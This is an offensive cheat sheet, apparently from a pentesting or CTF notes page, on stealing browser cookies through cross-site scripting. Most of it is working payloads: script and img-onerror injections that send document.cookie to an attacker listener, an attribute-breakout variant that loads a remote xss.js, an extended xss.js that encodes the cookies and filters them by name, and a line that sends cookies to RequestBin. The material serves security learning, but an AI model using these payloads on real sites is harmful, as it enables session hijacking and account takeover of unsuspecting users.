Stealing cookies to obtain privileges is the fever dream of hackers looking to exploit cross-site scripting vulnerabilities.
This payload pops an alert() box before sending the cookie. This is useful for testing a cross-site scripting payload and verifying that it is grabbing the intended information. Once the alert() box is closed, the cookie is sent to the attacker-controlled listener (172.0.0.1:1337 is used as the listener address throughout these examples; substitute your own host and port):
```html
<script>
alert(document.cookie);
var i=new Image;
i.src="http://172.0.0.1:1337/?"+document.cookie;
</script>
```
After verifying that the parameter is vulnerable to cross-site scripting, the following payload exfiltrates the cookie silently, with no alert() to tip off the victim:
```html
<script>var i=new Image;i.src="http://172.0.0.1:1337/?"+document.cookie;</script>
```
The following payload uses an img tag rather than a script tag. Because the src x does not resolve, onerror fires and repoints src at the listener; if the listener's reply is not a valid image either, onerror fires again, and the payload keeps resending the cookie, ultimately filling up your server with cookies. I have found this can be life-saving in a CTF when things are not working as the author originally intended:
```html
<img src=x onerror=this.src='http://172.0.0.1:1337/?'+document.cookie;>
```
The way I like to capture cookies is to submit the following payload, which calls back to a JavaScript file that I host on a Python web server (for example `python3 -m http.server 80` run in the directory containing the file). The first form works where the injection lands directly in page content; the second closes an open attribute value and tag first, for injection points inside an HTML attribute:
```html
<script src="http://172.0.0.1/xss.js"></script>
"><script src=http://172.0.0.1/xss.js></script>
```
The xss.js file looks like the following; it does the same as the payloads above, grabbing the cookie and sending it to my hosted web server. Note that document.cookie only exposes cookies set without the HttpOnly flag, so a session cookie marked HttpOnly will not appear in the captured value no matter which payload is used:
```javascript
// Grab the cookie and ship it to the listener as an image request.
function pwn() {
  var img = document.createElement("img");
  // The parameter name is empty ("?="); the listener reads the raw query string.
  img.src = "http://172.0.0.1/xss?=" + document.cookie;
  document.body.appendChild(img);
}
pwn();
```
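A variant of xss.js, added here as an example rather than taken from the page, that URL-encodes the cookie string before putting it in the query and can narrow the upload to the cookies of interest. Appending document.cookie raw, as the payloads above do, works most of the time, but a `#` inside a cookie value truncates the query at the fragment and an `&` splits it into extra parameters. The listener address http://172.0.0.1:1337/ and the parameter name `c` are assumptions chosen to match a listener that reads `?c=`; adjust them to your setup.

```javascript
// Added example, not the page's xss.js: Image-based exfil with the cookie
// string URL-encoded and optionally filtered to named cookies.
// Assumed listener: http://172.0.0.1:1337/ reading the "c" query parameter.

// Split a document.cookie string ("a=1; b=2") into [name, value] pairs.
function parseCookies(cookieString) {
  return cookieString.split(';')
    .map(function (part) { return part.trim(); })
    .filter(function (part) { return part.length > 0; })
    .map(function (part) {
      var eq = part.indexOf('=');
      return eq < 0 ? [part, ''] : [part.slice(0, eq), part.slice(eq + 1)];
    });
}

// Build the exfil URL. encodeURIComponent keeps '#', '&' and '+' in cookie
// values from being misread by the browser or the listener. `wanted` is an
// optional array of cookie names; null sends everything document.cookie exposes.
function buildExfilUrl(base, cookieString, wanted) {
  var pairs = parseCookies(cookieString);
  if (wanted) {
    pairs = pairs.filter(function (p) { return wanted.indexOf(p[0]) !== -1; });
  }
  var payload = pairs.map(function (p) { return p[0] + '=' + p[1]; }).join('; ');
  return base + '?c=' + encodeURIComponent(payload);
}

// Fire the request from a browser. document.cookie never contains cookies
// flagged HttpOnly, so those cannot be stolen this way regardless of encoding.
function pwn(base, wanted) {
  var target = buildExfilUrl(base, document.cookie, wanted);
  var img = new Image();
  img.src = target;
  return target;
}

// Only runs inside a browser; under Node (e.g. when unit-testing the
// URL builder) document is undefined and nothing is sent.
if (typeof document !== 'undefined') {
  pwn('http://172.0.0.1:1337/', null);
}
```

Host this file as xss.js next to the payloads above; the listener then receives a single `c` parameter and decodes it with its normal query-string parser, so cookie values survive intact.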
Unless you're in a CTF environment, I highly recommend capturing the cookies on a local web server or a controlled Burp Collaborator instance. Sending a victim's session cookies to a third-party website you don't control seems like a bad idea to me. That said, sites such as RequestBin exist and can receive the request:
```html
http://172.0.0.1:1337/<script>new Image().src="http://requestbin.net/r/mybin?c="+document.cookie;</script>
```
{% embed url="https://github.com/R0B1NL1N/WebHacking101/blob/master/xss-reflected-steal-cookie.md" %}
{% embed url="https://snowscan.io/htb-writeup-bankrobber/" %}